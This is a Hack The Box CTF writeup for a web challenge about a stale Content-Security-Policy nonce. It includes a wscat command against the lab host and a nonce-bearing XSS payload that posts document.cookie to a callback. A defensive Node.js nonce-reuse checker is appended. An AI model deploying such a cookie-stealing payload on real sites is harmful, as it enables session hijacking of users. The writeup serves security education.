HackTheBox Cursed Stale Policy Writeup
Explore the basics of cybersecurity in the Cursed Stale Policy Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/811
Description
This policy is cursed, can you bypass it?
Exploitation
Looking at the code, the most developed aspect seems to be the logging in the websocket, so here’s the approach to interact with it:
wscat -c http://94.237.59.180:49425/ws
The nonce is shown in the default policy, and this is the already provided payload with the nonce:
<script nonce="5247551b650fb492cdb1cad3fe71d337">
  fetch('/callback', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ cookies: document.cookie })
  });
</script>
Trigger the Bot, and the result will be displayed either in the WebSocket logs or in the Request History.
Note: Previously, the Request History feature was not implemented, which is why using the websocket was necessary to capture the information.
Summary
The Cursed Stale Policy Challenge on Hack The Box is an easy-level cybersecurity challenge that focuses on bypassing web security measures by exploiting a nonce in a script. Participants use a script with a specified nonce to execute JavaScript that the policy accepts as legitimate, which fetches and posts cookie data, navigating around the web security policy. This challenge provides insights into how nonce attributes can be leveraged to bypass security restrictions, offering a practical understanding of web policy enforcement and vulnerabilities.
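An added example, not part of the original writeup or the challenge code: a Node.js check that flags a CSP nonce repeated across responses, next to per-response nonce generation as the corrected form. It assumes the weakness is a nonce that does not change between responses, as the challenge name suggests; the function names and the sample policy strings are constructed for illustration.

```javascript
const { randomBytes } = require('crypto');

// Extract every 'nonce-...' source from one Content-Security-Policy header value.
function extractNonces(cspHeader) {
  const nonces = [];
  const re = /'nonce-([^']+)'/g;
  let m;
  while ((m = re.exec(cspHeader)) !== null) nonces.push(m[1]);
  return nonces;
}

// Given the CSP header values of successive responses, return the nonces
// that appear in more than one response. A nonce is only a secret if it is
// unpredictable and used for a single response.
function findReusedNonces(cspHeaders) {
  const seenIn = new Map(); // nonce -> number of responses carrying it
  for (const header of cspHeaders) {
    for (const nonce of new Set(extractNonces(header))) {
      seenIn.set(nonce, (seenIn.get(nonce) || 0) + 1);
    }
  }
  return [...seenIn].filter(([, count]) => count > 1).map(([nonce]) => nonce);
}

// Corrected form: a fresh 128-bit nonce from the CSPRNG for every response.
// The same value must be placed on the page's own <script nonce="..."> tags.
function buildPolicy() {
  const nonce = randomBytes(16).toString('base64');
  return { nonce, header: `default-src 'self'; script-src 'self' 'nonce-${nonce}'` };
}

// Constructed sample: two responses that serve the nonce quoted in the writeup.
const stale = [
  "default-src 'self'; script-src 'self' 'nonce-5247551b650fb492cdb1cad3fe71d337'",
  "default-src 'self'; script-src 'self' 'nonce-5247551b650fb492cdb1cad3fe71d337'",
];
// Two responses built with per-response nonces.
const fresh = [buildPolicy().header, buildPolicy().header];

console.log('stale policy, reused nonces:', findReusedNonces(stale));
console.log('fresh policy, reused nonces:', findReusedNonces(fresh));
```

In practice the header values would come from two or more separate requests to the same page; any non-empty result means an injected script tag can carry a nonce the browser will accept.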